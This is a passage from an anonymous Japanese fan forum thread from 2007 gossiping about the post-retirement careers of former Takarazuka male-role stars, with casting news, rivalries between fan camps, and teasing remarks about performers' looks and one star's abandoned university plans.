いい意味で、宝塚と違う新鮮な男役像を作ったということで成功だったと思う。
182 :
名無しさん@花束いっぱい。:2007/10/05(金) 22:44:39 ID:3CzMpMdK
来年8月新宿コマ「シンデレラ」鳳がやった『妖精の女王』は麻路に変更だそう。
『ボーイ・フロム・オズ』は来年10月再々演、鳳・紫吹は続投。
ということはやはり紫吹の『シカゴ』出演はない。(オズと同時期)
コムが男役できたのって前回のさえこが成功したからでしょうね。
かしげは宝塚に未練たらたらって感じかな?トートやりたかったのねって感じ。
185、
なかにし礼氏が、今年の完成度が非常に高くて
大満足だったと言っていたお。
わたるの金髪美女に違和感を覚えたのは自分だけなのか
>>186それ、偶然テレビで見た。
見所は牧瀬さんの宙吊りと大合唱だって。なかにしさんは合唱をほめてたね。
コムチャンは引き画面で小さくしか写らなかったよ。
それでかしげの女優はどうだったの?初日
188、
社会的認知度から言ったらまだまだ駆け出しだもん、
それもしょうがないよ。
すごいメンバーが一人一人話題にされてないんだし。
テレビ放送が楽しみだお。
コムの男役出演は偶然だろ。ファンもこだわってないみたいだし。
成功したみたいだけど、今後もやるなんて考えてないんでしょ。
かしげの同じ。かしげの女優の感想はないみたいだけど観劇した人少ないのかな。
牧瀬さんはただワイヤーで宙吊りにされていただけのような・・
イエイエ・・ひとりごとです。
191
昨年のBSだったかな?でやってた、なかにしさんのインタビューでは
サエコ中心の映像だったよ。締めもサエコだった。
聞くところによると拍手も出演者の中では一番多くもらってたみたいだし。
>>193は牧瀬里穂をsageてコムをage
>>194はコムをsageてサエコをage
似たもの同士だよw
かしげファンきんも〜
かしげの大顔、短足、スタイル悪いくせに
小顔で長身のたかこと比べるなんて、なんて厚かましいの!
>>200 でもさー、チャングムのかしげはへんな顔だったよ。髪の毛がないと顔の輪郭がいまいちな人なんだよ。
たかこのほうがまるっぽいから女性的なんだけどね。目は離れているけど。
>>200 その写真以外にないのかw
一生懸命すぎで笑える
ここはスレタイ通りマターリしてていいですね^^
ほらね。
ここはかしげファンの棲家で、イコールたかこアンチだよん。
タカコってアジアンの片割れに似てるよね。
スタイルは良いけれど。
かしげって馬に似てるよね。そっくり。
>207
上向きになるとやや似てるかも。歯が大きいからね。
でもって、凄い綺麗に見える角度と、こんなに頬骨出てたっけ?ってな
角度がある。
ある時はリカファン常駐と言ってみたり、
またある時はタカコファン入り浸りと言ってみたり、
かしげファンの巣窟と言ってみたり、
わたるファン張り付いてると言ってみたり、
アンチもそれぞれ忙しいことでw
わたるファンがタカコ叩いているのだけはホントでしょ?
ここに書き込むべきタカコバッシングを別館のわたるスレに誤爆してた人がいた。
両方を行き来してるうちに、間違えたんだよねw
>>210 お前以外そんなこと言ってない。
かしげファン=たかこアンチとみんな知ってる。
かしげファンが必死に矛先を変えようとしても無駄だから。
>>160 真矢みきちゃんまた第3弾やりそうなかんじね。
かしげファンがたかこアンチだとはあんまり思えないけど。
どちらかというと、たかこアンチはりかファンやわたるファンっぽい。
よくわからん。
なんでかしげファン=たかこアンチ なの?
同時期のトップでもなきゃ、ミテクレも個性も違うのに。
わたるファンはめったに尻尾は出さない。
別館に誤爆してタカコアンチやってるのがバレちゃった。
やっぱ悪い事はできないものだw
>>213 かしげ叩きたいためにタカコ叩きして
「タカコアンチ=かしげファン」ってわめく
いつもの椰子だよ、数日前に自演失敗してたじゃんw
215みたいな〇〇ファンのせいだと言いたいが為にゴバクと見せかけてやってたりしてな。
かしちゃん、良かったよ。
そりゃあ愛とか恋とかは無いけど、ぐっと舞台を締めてた。
綺麗だしね、威厳と品がいる役がはまってた。
>>190 ネットで見てきた感じでは、若者達がいっぱいいる中で一番エライ人、
てな役で嵌ってたそうだよ。
オーソドックスな喜劇になってるみたいだし、楽しみだ。
今さらだけど、いい意味でかしげはやっぱり
真ん中より脇で重要な役が合ってるんだなと思った。
脇でより光る個性ってのもアリだから
そういう路線で行くのもいいんじゃないかと思う。
『知っとこ』でいきなりタカコ!
ふっくらして、少し女らしくなったけど
あんなそうそうたるメンツと一緒に歌ったのか…
どんな感じだったのか読もうと思って別館かしげスレ行ってみたら
閑散としててビックリ・・・
初日感想で5レス行くか行かないかなんてありえない。
ちょっと遡って読んでみたら名前もない役だとか。
これ、どうなんだろうね。
223 :
名無しさん@花束いっぱい。:2007/10/06(土) 09:24:18 ID:6xTjSAO9
男役さんのファンの方って大変ですね。
私の贔屓は、元トップとは言え娘役だったので、
ここでは話題にも上らず、まさにマターリしてますよ(*^-^*)
かしげ、M!の男爵夫人とかいーかも。
>>222がシェークスピア喜劇を知らないのは判ったw
>222
別館かしげスレは、もともと5〜6人で回してると思われるから。
>>226 あ、そっか。
その5〜6人の中の1人しか初日観に行けなかったから
感想が少なく盛り上がらなかったのね。納得。
男爵夫人…プ
シシィといい、大きく出るなあ。
アマデがウィーン行きを諦めちゃうかもしんないな。
うん、別館住人すらファンブログ巡りしてたみたいだし。
確かにその方が情報早そうw
ネットしてる率低いのか何なのか。
しかし現役時代の芝居が、ああ見えて結構男臭い部分が
あったから、今回の女役どうなってるのか気になる。
脇で光るというより、良くも悪くも器用なんだよね。
トップとしてやってる姿に違和感もなかったけど、主役を食うような激しい主張もない。
演出としては使いやすいだろうけど、使いたいと思ってもらえるようになるには、まだまだって感じ。
小粒で小器用で印象が薄いのがカシゲの持ち味。
もう少し貫禄付いて歌えるようになったら確かに男爵夫人路線かもね。
何にしても、これから大きな舞台で主演ってのは無さそう。
ヅカ時代に魅力がなかった人は退団しても同じ位置づけな気がする。
最近退団したOGを見てもそうだし、昔に退団したOGを見てもそう思う。
ターコ、真央、ショーコ、アマミ、ミキみんな強烈なトップだった。
ヅカ時代にトップで、退団して並になった人はいても、その反対はいない。
ヅカ時代に大したことなくて、退団してトップスターになった人はいないから。
どう見てもキャラ違い器違いのコムがシシィかっさらった時点でカシゲは察した
んじゃないかな。
落ちるのなら早い方がいいと思うし。
中途半端な舞台やテレビを貰って挫折知らずで年取るよりは、ここいらで自分の
立場をわきまえて自分なりの道を開拓できたらいいと思う。
最近のOGはどうも無難な路線を歩み始める代わりにブレイクとか脱皮がない気がする。
>>233 いやそうとも言えない。
並トップだった一路は?
これからコムも一路みたいになりそうな予感。
>>234 >中途半端な舞台やテレビを貰って挫折知らずで年取るよりは、ここいらで自分の
>立場をわきまえて自分なりの道を開拓できたらいいと思う。
この部分と
>最近のOGはどうも無難な路線を歩み始める代わりにブレイクとか脱皮がない気がする。
とは正反対な意見というか、言ってることが矛盾してないか?
結局どっちのことが言いたいんだ?
コムはまだいいよ。
でなくてかしげの方、並どころかワン切りだし。
何やってもパッとしない人だったから、この手の人がこの先売れるとは思えない。
>>237 だからさー、なぜコムが数年トップをやれて、かしげがワン切りされたか、ってことよ。
別にかしげは素晴らしいと思わないし、トップになるべき人材とは思わないけど。
それならコムだって特別なスターでもないし、かしげと同じようなもんでしょ?
コムのお披露目の東宝、ゴソッと空いていてびっくりしたもん。
それでも長くやらせてもらえるのと、ワン切りされるのと。
ね、そういうことよ。
今をマターリ語れ
今回のジャニ舞台はチケット難らしいから、それが感想の少なさに
拍車をかけてる気もする。
ファンもそこまで売れて欲しいとか考えてなさそうだしね、
かしげは。その辺はヅカ時代と変わらず変にのんびりしてると言うか。
やっぱり温室育ちのファンはこうなのかな。
『かしげが何をしようとどうなろうと着いていく』的な感じ。
ま、それぐらいのほうが程よく幸せな芸能生活を送れるんじゃない。
まあ、コムはあの状況のお披露目をやり遂げて今があるわけだし、
かしげとは成り立ちも状況も違うから比べようが無い。
というか、比べたらコムの方がかしげよりはスター性があるってことになると思うよ。
>230
今回は男前な姐さん風味が役柄と合っていたから無問題。
本格的な女芝居になるであろうクミョンがどうなるか心配
それにしても実力者揃いのドラキュラ舞台より
まともにセリフもしゃべれんような未熟者揃いのアイドル舞台のほうが
ずっと面白かったのはどうしたわけか。
やっぱり芝居はホンなのか、宝塚見てると忘れがちだけど。
>>240 まるっと同意。
今回はFCチケもお断りが開演1週間前でした。まぁジャニは色々あるみたいで
仕方がないようだけど。
コムちゃんの方がはるかに人気あったからでしょ。
>>241 いや、私の言っていることがわかっていただけていないらしい。
かしげだって、状況を乗り越えてもっとやっていれば違っていたでしょ?
コムだけじゃなくて、そこそこ出来るひとなら(歌が壊滅的なタニはだめだろうが)
大事に育てられれば・・・ながくやらせてもらえれば、そこそこ行くってことが言いたいの。
私は、かしげにそれだけスター性があるとも思わないけど、ないとも思わない。
コムも同じ。
だから、かしげにもっとやらせてあげれば、退団後だって違ってきてるはず。
別にかしげを擁護する訳でもなく、コムを貶している訳じゃない。
そういうもんじゃないの?といいだいだけ。
こんなとこに居ないで閑散としてる別館で語れば。
1作を愚痴るなり、ジャニ主演舞台であった不幸を嘆くなり。
他OGを引き合いに出して感じ悪いったらありゃしない。
>>246 ん?245さんは別にカシヲタでないと思うんだが。ただの傍観者じゃないの?
>>246 わたしのこと?
ファンじゃないもん、別館になんて用ない。
強いて言えば、劇団のやり方に不満たらたら、ってとこ。
>245
「・・・たら、・・れば」の話はいくらでも良い様に考えられるが
現実だけを考えた方がいいよ。
かしげは、ずうっと大事に育てられてきたんだよ。
人気のあるなし実力のあるなしを問われることも無く
二番手にもすんなりなれて、組ファンからはトップみたいだと言われるほど
美味しい場面をいくつも貰いながら、大事に大事にね。
それでも人気は上がらず、和物以外の芝居は似合わず。
ファンは真ん中に立たせれば絶対人気があがると言い続け。
なのに、判官びいきのトップ就任退団だったにもかかわらず
プレお披露目の博多も、退団なのに東宝もご存知の通りの結果だった。
多分、一作でよかったんだよ、あれ以上人気はでないでしょ。
トップの場が似合っていたなら、人気は上がって、
退団後の主演作品ももっと売れたはず。
そういう話題は昔話スレの方でどぞ。
>>246 しかも、そもそもたかちゃんドラキュラ話から引き合いに出されたのは
かしげの方であって…
>多分、一作でよかったんだよ、あれ以上人気はでないでしょ。
>トップの場が似合っていたなら、人気は上がって、
>退団後の主演作品ももっと売れたはず。
それは思う。
ファンが黙ってなかっただろうし。
静かに辞めてそのままスンナリ女優転身って感じ。
それじゃあ熱いファンの熱気と勢いがある他のOGに負けちゃうよね。
まあ何が勝ちで負けかは向かう方向性と価値観で違うかもしれないけど・・・。
少なくともスタートはコムワタが一段高いところから始まったように見える
>252
コムとワタルにも超えられない壁があるけどナーw
>>252 なんで比べるのかねえ。
比べついでに、シシイコムとわたるを並べるのも違うと思うが。
でもわたるファンは幸せそうだからいんじゃね。
何があっても御曹司として大事に育てられ、本人も努力、さらに強運でトップ最後に大当たり→一路
途中から競わされて一気にジャンプアップ、トップ最後に当たり役→コム
御曹司として育てられたけど期待には応えきれないまま一作でおしまい→かしげ
どんな人もトップになるまでに結果を出さなければ、トップにはなれないのだと思うがね。
かしげのお話嬉しいです。249がずばりそうです。
ファンや観客を狂わせる怪しい魅力がなかったのです。
かしげ爽やかだしね。熱いファンがいなかったか少なすぎたのです。
宝塚の男役時代に沢山ファンがいても、退団後女優になって実力無しだとファン数減る。
かしげが女優になってどう実力をつけるかが、今後生き残るかどうかだと思う。
のんちゃんやたーのようにいい仕事にしていければ、かしげの需要はこれから増えるはず。
>>169 左は清水ミチコに似てる
右はお笑いの虻川に似てる
>>256 怪しい魅力…
怪しい魅力を持つトップさんはあまり居ないような…w
わたるは本人もファンも女優だけで行くには身長のハンデがあることは
判っていると思う。
これからいろんなことに試行錯誤していくんじゃないかな。
マミさんに近い活動になっていくような気がする。
悪いけどどーでも良いなw
ならすっこんでろ。
249は現実を現実として認めたくないだけなんだよね
大嘘ばっかり。
上のほうで誰かが書いていたけれど、うまい俳優そろえた駄作より
素人のような俳優が多くてもいい脚本だと、見ごたえがあるって・・真実だよね。
ま、駄作とシェークスピアを比べるのもどうかと思うけれどw
でも駄作でもベルばらは当る・・・から興行は難しい。
ワンギリでもトップになれたかしげは良かったんじゃない。
一生ついて回る宣伝文句「元○組トップスター」
御曹司として育てられ結果を出さずに退団して行く人は数知れず
これはトップスターの席が限られているから仕方ないし
コムみたいに期待されていなかったのに
敗者復活戦みたいにでいきなり登場してくる人もいるわけだしね。
在団中の人気で食えるのはせいぜい1,2年。
退団後の仕事いかんでは、一気に減る。
ゆり、しょうこ、みき、まみだって
在団中の人気があって今の場所にいるわけじゃなくて
本人の売り(性格だったり、容姿だったり、トークだったり)で今の場所にいると思うから。
わたるは、背が高いけど、アクション女優を目指しているらしいし
良い選択だと思う。
外部へ出たら得意分野を持つのが大事だね。
綺麗で若いのは沢山いるから。
ファンは、かしげが首にならないよう劇場に通ってあげるのが
大事だな。
わたるは年明け早々ディナーショーなんでしょ。
仕事順調みたいで、大学受験どころじゃないね。
これからは、どうして大学受験を辞めたかの理由(言い訳)を、
考えなきゃね。
結婚するって言ってしなかった人もいるし、大学行きたいって言って行かなくても責められないよ。
もう舞台には立ちません!、と言ったのに舞台やってる人もいるし、
女優にはなりません!、と言ったのに女優している人もいる。
それに比べりゃ、大学行きを止めるのなんて、可愛いもんです。
可愛いけど、かっこ悪いよね。
とにかく認定試験受かってからの話なんじゃないの?
もう大学行く気無いだろうから、認定試験なんてどーでもいいでしょ。
受ける気ももうないんじゃない?
今年の試験も受けてないんでしょ。
>>269 うん、カッコ悪いw
タカコやコムのような大きな仕事が決まってるなら仕方ないと思うけど、
嘘つき呼ばわりされても構わない!って思えるほど
勿体無い仕事が来てるとは思えないもん。
わたるが進学しようがどうでもいいけど、大学進学と結婚しようとしてしなかった人と並べるな。
可哀想じゃねーかw
退団会見で、あんなにはっきり「大学受験します」って言わなきゃ良かったのに。
あの時のわたる君は、カッコいいーって本当に思ったのに。
金屏風の前で「勉強に専念したいと思っております。」と
カッコよく言ってたけどね。
見事に手のひら返した芸能生活。
やる気ないなら最初から言わなきゃよかったのに。
お茶会なんかでは「準備してます」ってな事言ってるみたいけどね。
「準備してます」って10年くらい言いながら、仕事していけばいいもんね。
10年も経てば、みんな大学受験の事、忘れてくれてるでしょ。
おっ、今日はわたるデーですね!
大学受験以前に、わたるの存在自体忘れ去られてるかもしれないしねw
うん、わたる存在薄くなった。
別館ヲチっていうか、勢いがあるので、時々覗くと少数がチャットしているみたい。
アンチっていうより、話題にしてもらってよかったねって感じ。
ほかのアンチはファンより詳しいのにわたるは層化と進学ネタしかないね。つまららん。
受験はいつでも出来るし勉強はそれこそ一生必要。
なら今しかできない目の前の仕事をこなすっていうのは有りなんじゃない?
予定以上に外で仕事が待っていたといか、在団中にレッスン通ったのと同じつもり
でいたら学業と舞台の両立は予想以上に大変だったのかもしれないし。
着実に少しずつでも勉強は続けてるんかもしれないよ。
気長に10年後の合格を目標に掲げてるかもしれないし。
検定は通ったってここでも言われてなかったっけ??
>>281 だから退団後なんてやってみなきゃわからないから
みんな会見では濁すのにわたるはあそこまでハッキリ言ったからカッコイイ!
ってなったのに実際やってみたらキツかった…
じゃ余計みっともないってゆー話でしょw
>>277 ずっと新発売のけんちゃんラーメンみたいだな
わたるってなにも医学部行って医者になろうとか
どの学部であれその分野の博士を取ろうとか考えてるわけじゃないでしょ?
大学入るのにそんな準備期間が必要なのかねw
まあ中卒だからあんまり勉強に慣れてない頭だとしても
そのへんの私大の社会人編入のレベルなんて知れてると思うけど。
高らかに「次の道は大学進学です」と言っちゃったんだから、
有言不実行かよという突っ込みがついて廻るのは、
数年くらいは仕方ないんじゃないの。
腰かけで仕事されても周りが迷惑だろうから、
しばらくは芸能活動に専念するんじゃないかと思うけどね。
今からどうこう言ってもね。
今は芸能人推薦とか自己推薦とか色々な推薦枠があるから
もう推薦で進学先が決まってるかもしれないしね。
マスコミに話題を提供して取り上げてもらえるならば、
それは芸能人としては賢いやり方でしょうよ。
ただ、まだはっきり分ってないのに、違うケースと比べて
まだまし等と擁護するのはいただけないけどね。
大学行く前に大検査受るわけだから、最短で来年入学ですがな
かしげファン良いぞ!
もっとやれ!どんどんやれ!
わたるもっと叩け!
>>281 検定合格はアンチがニュース記事捏造したガセ。
夏のはダンクレ中で受けられなかったはず。
次受けるかどうかは知りません。
そんな話よりまだ夜叉ヶ池の話聞きたいわ。
ここではあまり出てきてない?
アンチが捏造流したの??
親切なアンチだね。
まだ大検も受かってないなら尚更みっともないんだけど。
うふふ。
今日のここの流れ、超楽しいwww
>>289 別館に行けば?
わたるに限らず、ここに公演評を書く人なんてアンチくらいだよ。